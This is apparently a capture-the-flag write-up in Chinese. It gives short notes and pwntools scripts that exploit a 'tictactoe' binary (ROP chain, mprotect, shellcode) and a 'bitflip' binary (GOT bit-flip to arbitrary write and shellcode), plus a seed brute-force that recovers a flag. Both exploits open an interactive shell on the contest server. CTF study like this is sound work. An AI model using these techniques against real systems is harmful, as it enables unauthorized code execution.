手动溢出修改success变量
写ROP链拿shell
from pwn import *
context.arch = 'amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'split', '-h']
binary = ("./tictactoe")
elf = ELF(binary, checksec=False)
r = remote("202.38.93.111", 10141)
pop_rdi = 0x00000000004017b6
pop_rsi = 0x0000000000407228
pop_rdx = 0x000000000043dbb5
bss = 0x4a8400
sh = flat([
'a'*0x98,
pop_rdi, 0,
pop_rsi, bss,
pop_rdx, 100,
elf.sym['read'],
pop_rdi, 0x4a8000,
pop_rsi, 0x1000,
pop_rdx, 7,
elf.sym['mprotect'],
bss
])
r.sendlineafter("(0,1): ", sh)
r.sendlineafter("(0,1): ", "(1,1)")
r.sendlineafter("(0,1): ", "(0,2)")
r.sendlineafter("(0,1): ", "(1,0)")
r.sendlineafter("(0,1): ", "(2,2)")
r.send(asm(shellcraft.sh()))
r.interactive()见CVE。主要是mmap+MAP_FIXED可以覆盖ld的.text段,从而让ld执行shellcode
修改exit的got表1个bit,使程序流在main函数中产生循环,可以达到任意地址写的效果,然后写shellcode进行跳转。
from pwn import *
context.arch = 'amd64'
context.log_level = "debug"
context.terminal = ['tmux', 'split', '-h']
binary = ("./bitflip")
r = remote("202.38.93.111", 10231)
def writeb(addr, left):
r.sendlineafter("flip?\n", hex(addr) + " " + str(left))
def writep(addr, data):
for addr_bit in range(8):
for xor_bit in range(8):
if (data>>xor_bit) & 1 == 1:
writeb(addr + addr_bit, xor_bit)
data = data >> 8
if data == 0:
break
writep(0x404039, 1)
s = asm(shellcraft.sh())
for i in range(6):
writep(0x401970 + i*8, u64(s[8*i:8*i+8]))
writep(0x404039, 8)
r.interactive()通过逆向汇编代码可知,随机因子不超过0xE40B个,复现一遍程序流程进行爆破即可。
f = open("output", 'w')
for seed in range(0xE40B):
rnd = 0x41C64E6D
randtable = []
buffer = [0 for i in range(15)]
table1 = [
[ 0x5075, 0x4AC5, 0x724A, 0x458C, 0x7194, 0x704A, 0x613A, 0x7133, 0x6654, 0x7C59, 0x6800, 0x60C6, 0x49E4, 0x7164, 0x5DE1] ,
[ 0x5981, 0x5B8C, 0x6496, 0x67AB, 0x5494, 0x7A40, 0x57AE, 0x407A, 0x55BD, 0x58E9, 0x760D, 0x7325, 0x73B1, 0x4071, 0x59EE] ,
[ 0x5A8B, 0x783D, 0x5D45, 0x71F3, 0x7BB1, 0x67A6, 0x7D9F, 0x5837, 0x6B85, 0x7024, 0x79F0, 0x4306, 0x7CF4, 0x7DBE, 0x5CC3] ,
[ 0x5318, 0x531E, 0x6097, 0x7520, 0x62D7, 0x5B95, 0x5A4F, 0x5A73, 0x66EA, 0x6715, 0x781B, 0x7114, 0x7ABA, 0x534B, 0x7C0E] ,
[ 0x78BF, 0x4966, 0x5340, 0x620B, 0x574C, 0x6341, 0x72AD, 0x56A4, 0x5C24, 0x707A, 0x46D5, 0x6418, 0x55D4, 0x5B69, 0x60F5] ,
[ 0x7A89, 0x6263, 0x7B1D, 0x4D80, 0x70A4, 0x513A, 0x4F0F, 0x5FCB, 0x785E, 0x5DD0, 0x4622, 0x52EB, 0x4133, 0x7652, 0x5B5F] ,
[ 0x5002, 0x60F6, 0x7CE0, 0x77BB, 0x6D04, 0x58A2, 0x789B, 0x791B, 0x7C03, 0x4E0A, 0x638A, 0x4883, 0x75BF, 0x6C8C, 0x6822] ,
[ 0x66B7, 0x5ACC, 0x69CE, 0x6758, 0x5EBB, 0x6FE7, 0x58FF, 0x6B44, 0x4AF3, 0x5AD4, 0x5E0E, 0x4B03, 0x668B, 0x46C1, 0x4C56] ,
[ 0x5FD5, 0x411A, 0x5DE6, 0x7FE8, 0x6FFE, 0x76E6, 0x670B, 0x489F, 0x759D, 0x678D, 0x51D3, 0x6C30, 0x59A1, 0x6B96, 0x7D80] ,
[ 0x6348, 0x54AB, 0x4BBD, 0x69CD, 0x72C4, 0x4EC3, 0x526E, 0x78D8, 0x788E, 0x4736, 0x5590, 0x422A, 0x40C3, 0x50A1, 0x6B9F] ,
[ 0x58D4, 0x605A, 0x41C4, 0x5B0A, 0x6C0D, 0x678A, 0x6FCF, 0x7478, 0x4EC6, 0x72DD, 0x5DAE, 0x755E, 0x4BA5, 0x615E, 0x4A55] ,
[ 0x7EC0, 0x449F, 0x4304, 0x48F6, 0x6FB2, 0x4D39, 0x6FD7, 0x64A9, 0x7A4D, 0x5F89, 0x77A1, 0x5541, 0x7473, 0x42D8, 0x7A8A] ,
[ 0x6301, 0x5F0D, 0x5DC5, 0x7B76, 0x78DE, 0x53C1, 0x7787, 0x596E, 0x465F, 0x4E1A, 0x6CFD, 0x68F4, 0x55BC, 0x6BDE, 0x5B99] ,
[ 0x5329, 0x4C84, 0x4DF3, 0x6DE5, 0x4138, 0x7B15, 0x666B, 0x4DEA, 0x6CF7, 0x7058, 0x6F83, 0x6E9B, 0x40E6, 0x6596, 0x42E9] ,
[ 0x60C1, 0x6020, 0x4532, 0x4512, 0x4864, 0x44BD, 0x723F, 0x7075, 0x6983, 0x7491, 0x7F80, 0x4464, 0x6C0E, 0x5BFC, 0x734A]
]
table2 = [
0x0DD, 0x0BFB6, 0x3094, 0x99FF, 0x0AC7C, 0x63B9, 0x56A3, 0x2A9A, 0x3DDF, 0x6A1D, 0x0B289, 0x0D716, 0x0E29D, 0x1BA9, 0x37E4,
0x88, 0x0BFA8, 0x30C1, 0x99EC, 0x0AC36, 0x63B0, 0x56F7, 0x2AB1, 0x3DCA, 0x6A08, 0x0B2CE, 0x0D705, 0x0E2F1, 0x1BF4, 0x37E9
]
for i in range(15):
r = (seed * rnd) + 0x0BC614E
r = r & 0xffffffff
rnd = r
randtable.append(r)
for i in range(15):
for j in range(15):
x = buffer[i]
x1 = table1[i][j]
x2 = randtable[j]
w1 = (x1 * x2) & 0xffff
buffer[i] = (x + w1) & 0xffff
flag = []
for i in range(30):
w1 = table2[i]
idx = i % 15
x = (w1 ^ buffer[idx]) & 0xff
flag.append(chr(x))
s = ''.join(flag) + '\n'
f.write(s)
f.close()